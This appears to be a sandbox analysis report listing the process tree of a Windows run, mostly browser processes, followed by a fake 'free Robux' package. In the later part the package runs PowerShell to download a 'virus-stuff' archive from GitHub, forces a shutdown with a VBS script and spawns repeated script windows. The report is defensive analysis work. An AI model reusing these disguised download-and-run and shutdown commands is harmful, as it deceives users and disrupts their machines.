C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=93 --field-trial-handle=8020,i,8272534600387337464,4516864815682585413,262144 --variations-seed-version=20250112-180253.846000 --mojo-platform-channel-handle=8056 /prefetch:12⤵PID:4216
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=94 --field-trial-handle=10616,i,8272534600387337464,4516864815682585413,262144 --variations-seed-version=20250112-180253.846000 --mojo-platform-channel-handle=6184 /prefetch:12⤵PID:6296
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=95 --field-trial-handle=5656,i,8272534600387337464,4516864815682585413,262144 --variations-seed-version=20250112-180253.846000 --mojo-platform-channel-handle=7468 /prefetch:12⤵PID:1304
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=96 --field-trial-handle=8980,i,8272534600387337464,4516864815682585413,262144 --variations-seed-version=20250112-180253.846000 --mojo-platform-channel-handle=9060 /prefetch:12⤵PID:2264
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=97 --field-trial-handle=10776,i,8272534600387337464,4516864815682585413,262144 --variations-seed-version=20250112-180253.846000 --mojo-platform-channel-handle=9096 /prefetch:12⤵PID:6368
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=98 --field-trial-handle=5684,i,8272534600387337464,4516864815682585413,262144 --variations-seed-version=20250112-180253.846000 --mojo-platform-channel-handle=6536 /prefetch:12⤵PID:5772
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=99 --field-trial-handle=9084,i,8272534600387337464,4516864815682585413,262144 --variations-seed-version=20250112-180253.846000 --mojo-platform-channel-handle=5616 /prefetch:12⤵PID:6184
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=100 --field-trial-handle=11992,i,8272534600387337464,4516864815682585413,262144 --variations-seed-version=20250112-180253.846000 --mojo-platform-channel-handle=8824 /prefetch:12⤵PID:5792
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=101 --field-trial-handle=7984,i,8272534600387337464,4516864815682585413,262144 --variations-seed-version=20250112-180253.846000 --mojo-platform-channel-handle=10460 /prefetch:12⤵PID:2232
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=102 --field-trial-handle=12104,i,8272534600387337464,4516864815682585413,262144 --variations-seed-version=20250112-180253.846000 --mojo-platform-channel-handle=7816 /prefetch:12⤵PID:6984
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=103 --field-trial-handle=11416,i,8272534600387337464,4516864815682585413,262144 --variations-seed-version=20250112-180253.846000 --mojo-platform-channel-handle=12120 /prefetch:12⤵PID:6140
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=104 --field-trial-handle=12284,i,8272534600387337464,4516864815682585413,262144 --variations-seed-version=20250112-180253.846000 --mojo-platform-channel-handle=5688 /prefetch:12⤵PID:5216
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=105 --field-trial-handle=11728,i,8272534600387337464,4516864815682585413,262144 --variations-seed-version=20250112-180253.846000 --mojo-platform-channel-handle=11700 /prefetch:12⤵PID:7132
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=106 --field-trial-handle=12116,i,8272534600387337464,4516864815682585413,262144 --variations-seed-version=20250112-180253.846000 --mojo-platform-channel-handle=11464 /prefetch:12⤵PID:6760
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=107 --field-trial-handle=11852,i,8272534600387337464,4516864815682585413,262144 --variations-seed-version=20250112-180253.846000 --mojo-platform-channel-handle=11592 /prefetch:12⤵PID:6636
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=108 --field-trial-handle=12264,i,8272534600387337464,4516864815682585413,262144 --variations-seed-version=20250112-180253.846000 --mojo-platform-channel-handle=11356 /prefetch:12⤵PID:6280
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=109 --field-trial-handle=12312,i,8272534600387337464,4516864815682585413,262144 --variations-seed-version=20250112-180253.846000 --mojo-platform-channel-handle=12320 /prefetch:12⤵PID:5608
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=110 --field-trial-handle=9780,i,8272534600387337464,4516864815682585413,262144 --variations-seed-version=20250112-180253.846000 --mojo-platform-channel-handle=9200 /prefetch:12⤵PID:6280
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=111 --field-trial-handle=5956,i,8272534600387337464,4516864815682585413,262144 --variations-seed-version=20250112-180253.846000 --mojo-platform-channel-handle=7936 /prefetch:12⤵PID:6068
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5844,i,8272534600387337464,4516864815682585413,262144 --variations-seed-version=20250112-180253.846000 --mojo-platform-channel-handle=5784 /prefetch:82⤵PID:5208
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=113 --field-trial-handle=5712,i,8272534600387337464,4516864815682585413,262144 --variations-seed-version=20250112-180253.846000 --mojo-platform-channel-handle=6360 /prefetch:12⤵PID:5900
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=9276,i,8272534600387337464,4516864815682585413,262144 --variations-seed-version=20250112-180253.846000 --mojo-platform-channel-handle=9512 /prefetch:82⤵PID:7032
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=115 --field-trial-handle=12388,i,8272534600387337464,4516864815682585413,262144 --variations-seed-version=20250112-180253.846000 --mojo-platform-channel-handle=5720 /prefetch:12⤵PID:1668
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.4355 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=10836,i,8272534600387337464,4516864815682585413,262144 --variations-seed-version=20250112-180253.846000 --mojo-platform-channel-handle=11120 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:5596
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=117 --field-trial-handle=6516,i,8272534600387337464,4516864815682585413,262144 --variations-seed-version=20250112-180253.846000 --mojo-platform-channel-handle=4788 /prefetch:12⤵PID:4600
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=118 --field-trial-handle=6352,i,8272534600387337464,4516864815682585413,262144 --variations-seed-version=20250112-180253.846000 --mojo-platform-channel-handle=12328 /prefetch:12⤵PID:6400
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-appcompat-clear --field-trial-handle=6748,i,8272534600387337464,4516864815682585413,262144 --variations-seed-version=20250112-180253.846000 --mojo-platform-channel-handle=8208 /prefetch:82⤵PID:6596
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=6840,i,8272534600387337464,4516864815682585413,262144 --variations-seed-version=20250112-180253.846000 --mojo-platform-channel-handle=9552 /prefetch:82⤵
- Modifies registry class
PID:2484
-
-
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"1⤵PID:2588
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc1⤵PID:2388
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:5408
-
C:\Users\Admin\Downloads\GSAutoClicker.exe"C:\Users\Admin\Downloads\GSAutoClicker.exe"1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3452 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.remouse.com/2⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:6576 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x140,0x144,0x148,0x11c,0x14c,0x7ffb285d46f8,0x7ffb285d4708,0x7ffb285d47183⤵PID:6516
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2140,1557623973657617400,7025948732351815147,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2144 /prefetch:23⤵PID:2160
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2140,1557623973657617400,7025948732351815147,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2236 /prefetch:33⤵
- Suspicious behavior: EnumeratesProcesses
PID:6164
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2140,1557623973657617400,7025948732351815147,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2940 /prefetch:83⤵PID:7056
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,1557623973657617400,7025948732351815147,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3648 /prefetch:13⤵PID:5672
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,1557623973657617400,7025948732351815147,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3676 /prefetch:13⤵PID:800
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,1557623973657617400,7025948732351815147,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3244 /prefetch:13⤵PID:6660
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2140,1557623973657617400,7025948732351815147,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5824 /prefetch:83⤵PID:5944
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings3⤵
- Drops file in Program Files directory
PID:3112 -
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x264,0x268,0x26c,0x240,0x270,0x7ff689265460,0x7ff689265470,0x7ff6892654804⤵PID:4240
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2140,1557623973657617400,7025948732351815147,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5824 /prefetch:83⤵
- Suspicious behavior: EnumeratesProcesses
PID:6972
-
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:5976
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:6248
-
C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux.exe"C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux.exe"1⤵
- System Location Discovery: System Language Discovery
PID:6524 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\ECF6.tmp\ECF7.tmp\ECF8.bat C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux.exe"2⤵PID:6028
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "Invoke-WebRequest https://github.com/astrohnugget/virus-stuff/archive/refs/heads/main.zip -outfile robux2.zip"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:6056
-
-
C:\Windows\system32\timeout.exetimeout /t 3 /nobreak3⤵
- Delays execution with timeout.exe
PID:3108
-
-
C:\Windows\system32\timeout.exetimeout /t 3 /nobreak3⤵
- Delays execution with timeout.exe
PID:2884
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\free bobux.bat" "1⤵PID:2320
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "Invoke-WebRequest https://github.com/astrohnugget/virus-stuff/archive/refs/heads/main.zip -outfile robux2.zip"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4404
-
-
C:\Windows\system32\timeout.exetimeout /t 3 /nobreak2⤵
- Delays execution with timeout.exe
PID:5208
-
-
C:\Windows\system32\timeout.exetimeout /t 3 /nobreak2⤵
- Delays execution with timeout.exe
PID:6260
-
-
C:\Windows\system32\timeout.exetimeout /t 3 /nobreak2⤵
- Delays execution with timeout.exe
PID:1304
-
-
C:\Windows\system32\timeout.exetimeout /t 3 /nobreak2⤵
- Delays execution with timeout.exe
PID:1508
-
-
C:\Windows\system32\timeout.exetimeout /t 10 /nobreak2⤵
- Delays execution with timeout.exe
PID:5300
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\free bobux.bat" "1⤵PID:7136
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "Invoke-WebRequest https://github.com/astrohnugget/virus-stuff/archive/refs/heads/main.zip -outfile robux2.zip"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4848
-
-
C:\Windows\system32\timeout.exetimeout /t 10 /nobreak2⤵
- Delays execution with timeout.exe
PID:6080
-
-
C:\Windows\system32\mspaint.exe"C:\Windows\system32\mspaint.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\Screenshot 9_8_2022 5_26_53 PM.png"1⤵
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:5176
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s DeviceAssociationService1⤵PID:6152
-
C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux.exe"C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux.exe"1⤵
- System Location Discovery: System Language Discovery
PID:376 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\E1E1.tmp\E1E2.tmp\E1E3.bat C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux.exe"2⤵PID:6648
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "Invoke-WebRequest https://github.com/astrohnugget/virus-stuff/archive/refs/heads/main.zip -outfile robux2.zip"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:6908
-
-
C:\Windows\system32\timeout.exetimeout /t 10 /nobreak3⤵
- Delays execution with timeout.exe
PID:7016
-
-
-
C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux.exe"C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux.exe"1⤵
- System Location Discovery: System Language Discovery
PID:5204 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\45AB.tmp\45AC.tmp\45AD.bat C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux.exe"2⤵
- Checks computer location settings
- Modifies registry class
PID:5900 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "Invoke-WebRequest https://github.com/astrohnugget/virus-stuff/archive/refs/heads/main.zip -outfile robux2.zip"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:3804
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\rickroll.vbs"3⤵
- Checks computer location settings
PID:5288 -
C:\Windows\System32\SndVol.exe"C:\Windows\System32\SndVol.exe"4⤵
- Suspicious use of SendNotifyMessage
PID:1956
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/watch?v=dQw4w9WgXcQ4⤵PID:3356
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x21c,0x220,0x224,0x1f8,0x228,0x7ffb3b0acc40,0x7ffb3b0acc4c,0x7ffb3b0acc585⤵PID:6376
-
-
-
-
C:\Windows\system32\timeout.exetimeout /t 10 /nobreak3⤵
- Delays execution with timeout.exe
PID:5980
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\shutdown.vbs"3⤵
- Checks computer location settings
PID:2388 -
C:\Windows\System32\shutdown.exe"C:\Windows\System32\shutdown.exe" -s -t 604⤵PID:6904
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K start.cmd3⤵
- Checks computer location settings
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
PID:4732 -
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:5556
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:5060
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:1968
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:5128
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:5168
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:5676
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:3352
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:2124
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:1956
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:4368
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:1172
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:6012
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:2068
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:6492
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:4688
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:5072
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:2420
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:5700
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:4016
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:6512
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:6760
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:2288
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:5864
-
-
